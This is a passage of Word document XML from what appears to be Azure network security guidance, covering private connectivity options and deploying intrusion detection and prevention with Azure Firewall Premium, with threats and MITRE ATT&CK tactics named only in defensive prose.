          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy ExpressRoute for dedicated private connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C825D9A" w14:textId="2F64F8AD" w:rsidR="00183C06" w:rsidRDefault="00183C06" w:rsidP="00183C06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00183C06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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Default="00AA0171" w:rsidP="00AA0171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy Virtual WAN for global connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CCBFD" w14:textId="45AD1EBF" w:rsidR="00AA0171" w:rsidRDefault="00AA0171" w:rsidP="00AA0171">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Azure Virtual WAN to build a global network connecting multiple sites, branches, and Azure regions through a unified hub-and-spoke architecture with integrated security and routing capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8DF83" w14:textId="2098C211" w:rsidR="002F5C4A" w:rsidRDefault="002F5C4A" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5C4A">
        <w:t>NS-9.3: Use VNet or subnet peering to join virtual networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352B17FC" w14:textId="16FDD5E5" w:rsidR="00790D60" w:rsidRDefault="00790D60" w:rsidP="00790D60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790D60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use virtual network peering or subnet peering to establish private connectivity between Azure virtual networks without routing traffic over the public internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56938972" w14:textId="166CD600" w:rsidR="00790D60" w:rsidRDefault="00790D60" w:rsidP="00790D60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790D60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Deploy virtual network peering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5F122" w14:textId="33DF9E5F" w:rsidR="00790D60" w:rsidRDefault="00790D60" w:rsidP="00790D60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00790D60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use virtual network peering to connect entire Azure virtual networks, enabling resources in different VNets to communicate privately as if they were in the same network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A89FAA" w14:textId="282EFF94" w:rsidR="00CD1B2B" w:rsidRDefault="005A5D3F" w:rsidP="00314EE9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc236841627"/>
      <w:r w:rsidRPr="005A5D3F">
        <w:t>Monitor and respond</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="0171FF29" w14:textId="7ED42F94" w:rsidR="00FF075C" w:rsidRPr="001072B1" w:rsidRDefault="00FF075C" w:rsidP="00FB339D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc236841628"/>
      <w:r w:rsidRPr="00C933C9">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
        <w:t>NS-4: Deploy intrusion detection/intrusion prevention</w:t>
      </w:r>
      <w:r w:rsidRPr="001072B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems (IDS/IPS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="02AB7A7F" w14:textId="7E4A34E4" w:rsidR="0017603D" w:rsidRDefault="0017603D" w:rsidP="0017603D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017603D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48635DC6" w14:textId="19F6900A" w:rsidR="008C0F53" w:rsidRDefault="008C0F53" w:rsidP="008C0F53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0F53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use network intrusion detection and intrusion prevention systems (IDS/IPS) to inspect the network and payload traffic to and from your workload or virtual networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166AF2F2" w14:textId="020275DA" w:rsidR="008C0F53" w:rsidRDefault="008C0F53" w:rsidP="008C0F53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C0F53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidRPr="008C0F53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D19867" w14:textId="1546205D" w:rsidR="008C0F53" w:rsidRDefault="00853A91" w:rsidP="00853A91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Protocol exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4193F3CA" w14:textId="55EBB47B" w:rsidR="00853A91" w:rsidRDefault="00853A91" w:rsidP="00853A91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerabilities in protocols like RDP (TCP 3389) or HTTP/HTTPS (TCP 80/443) enable unauthorized access or system compromise through exploits such as CVE-targeted attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C230004" w14:textId="4A15BC72" w:rsidR="00DF7ED3" w:rsidRDefault="00DF7ED3" w:rsidP="00DF7ED3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF7ED3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Command-and-control (C2) communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63668619" w14:textId="26D4B63A" w:rsidR="00DF7ED3" w:rsidRDefault="00DF7ED3" w:rsidP="00DF7ED3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF7ED3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Malicious servers establish control over compromised devices via DNS queries or IP-based callbacks, facilitating persistent exploitation or malware propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489B3B4" w14:textId="28A5932D" w:rsidR="00DF7ED3" w:rsidRDefault="00DF7ED3" w:rsidP="00DF7ED3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF7ED3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Application exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED82B4B" w14:textId="0CC09AF4" w:rsidR="00796701" w:rsidRDefault="00796701" w:rsidP="00796701">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796701">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attacks like SQL injection, cross-site scripting (XSS), or buffer overflows target application vulnerabilities to steal data or execute arbitrary code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EDB4D5" w14:textId="4AC2D63E" w:rsidR="00796701" w:rsidRDefault="00796701" w:rsidP="00796701">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796701">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713392EB" w14:textId="586C0962" w:rsidR="00796701" w:rsidRDefault="00796701" w:rsidP="00796701">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796701">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Anomalous internal traffic, such as SMB (TCP 445) enumeration or Kerberos (TCP 88) ticket abuse, signals attacker pivoting within the networ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EB4265" w14:textId="7E8A1E78" w:rsidR="00396C5D" w:rsidRDefault="00396C5D" w:rsidP="00396C5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396C5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449C318B" w14:textId="7F618430" w:rsidR="00396C5D" w:rsidRDefault="00396C5D" w:rsidP="00396C5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396C5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unauthorized data transfers occur over encrypted channels (e.g., HTTPS POSTs) or high-volume egress, using obfuscation to evade detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752CB426" w14:textId="777BCF04" w:rsidR="00396C5D" w:rsidRDefault="00396C5D" w:rsidP="00396C5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396C5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DB96F3" w14:textId="028049BE" w:rsidR="00396C5D" w:rsidRDefault="0040536F" w:rsidP="00396C5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040536F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DCC876" w14:textId="473DC7DA" w:rsidR="0040536F" w:rsidRDefault="0040536F" w:rsidP="00396C5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040536F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3ACC88" w14:textId="33E9E0B2" w:rsidR="0040536F" w:rsidRDefault="0040536F" w:rsidP="00396C5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040536F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FD2BF8" w14:textId="7EF1AE71" w:rsidR="008C0F53" w:rsidRDefault="007A4041" w:rsidP="007A4041">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4041">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2E28D1" w14:textId="72004BB9" w:rsidR="007A4041" w:rsidRDefault="007A4041" w:rsidP="007A4041">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4041">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3E4EC7" w14:textId="3A020918" w:rsidR="00C314DD" w:rsidRDefault="00C314DD" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C314DD">
        <w:t>NS-4.1: Deploy Azure Firewall Premium for IDPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7863C8" w14:textId="554C3BB6" w:rsidR="00C314DD" w:rsidRDefault="00C314DD" w:rsidP="00976457">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C314DD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy and configure IDPS through Azure Firewall Premium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CA9181" w14:textId="51D8CC87" w:rsidR="00976457" w:rsidRDefault="00976457" w:rsidP="00976457">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy Azure Firewall Premium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FB0BD4" w14:textId="5F40DC96" w:rsidR="00976457" w:rsidRDefault="00976457" w:rsidP="00976457">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976457">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy Azure Firewall Premium with Premium Policy in your hub VNet to enable IDPS capabilities alongside other advanced features like TLS inspection and URL filtering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A0980C" w14:textId="0871BDC7" w:rsidR="008B3725" w:rsidRDefault="008B3725" w:rsidP="008B3725">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3725">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Select IDPS signature rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C32E68" w14:textId="32644859" w:rsidR="000C71D9" w:rsidRDefault="000C71D9" w:rsidP="000C71D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C71D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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24BC3375" w:rsidR="006545D3" w:rsidRDefault="006545D3" w:rsidP="006545D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006545D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure IDPS mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49915AE3" w14:textId="3EE540F8" w:rsidR="006545D3" w:rsidRDefault="006545D3" w:rsidP="006545D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006545D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>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4885B380" w:rsidR="00E81F50" w:rsidRDefault="00E81F50" w:rsidP="00E81F50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E81F50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
